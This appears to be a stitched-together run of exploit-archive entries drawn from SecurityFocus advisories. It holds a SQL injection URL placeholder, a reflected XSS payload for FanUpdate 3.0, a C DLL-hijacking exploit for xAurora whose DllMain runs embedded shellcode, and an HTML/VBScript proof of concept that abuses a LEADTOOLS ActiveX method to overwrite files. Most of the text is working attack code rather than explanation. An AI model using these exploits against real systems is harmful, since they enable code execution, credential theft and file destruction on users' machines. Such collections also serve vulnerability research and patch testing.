http://www.example.com/path/detail_produit.php?id_shop=3&ref=200308G[SQLI]
source: https://www.securityfocus.com/bid/48392/info
FanUpdate is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
FanUpdate 3.0 is vulnerable; other versions may also be affected.
http://www.example.com/header.php?pageTitle=%3C/title%3E%3Cscript%3Ealert%28123%29;%3C/script%3E
/*
source: https://www.securityfocus.com/bid/48432/info
xAurora is prone to a vulnerability that lets attackers execute arbitrary code.
An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file.
*/
#include <windows.h>
#include <stdlib.h>
#include <string.h>
char shellcode[]="\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x6a\x01\x8d\x85\xb9\x00"
"\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56"
"\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75"
"\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x61\x6c\x63"
"\x2e\x65\x78\x65\x00";
int xAuroraPwnage()
{
int *ret;
ret=(int *)&ret+2;
(*ret)=(int)shellcode;
MessageBox(0, "[+] xAurora Pwned By Zer0 Thunder !", "Not so Secured Browser", MB_OK);
return 0;
}
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
xAuroraPwnage();
return 0;
}
source: https://www.securityfocus.com/bid/48408/info
LEADTOOLS Imaging LEADSmtp ActiveX control is prone to a vulnerability caused by an insecure method.
Successfully exploiting this issue will allow attackers to create or overwrite files within the context of the affected application (typically Internet Explorer) that uses the ActiveX control. Attackers may execute arbitrary code with user-level privileges.
<html>
<object classid='clsid:0014085F-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' /></object>
<input language=VBScript onclick=Boom() type=button value="Exploit">
<script language = 'vbscript'>
Sub Boom()
arg1="FilePath\Filename_to_overwrite"
arg2=True
target.SaveMessage arg1 ,arg2
End Sub
</script>
</html>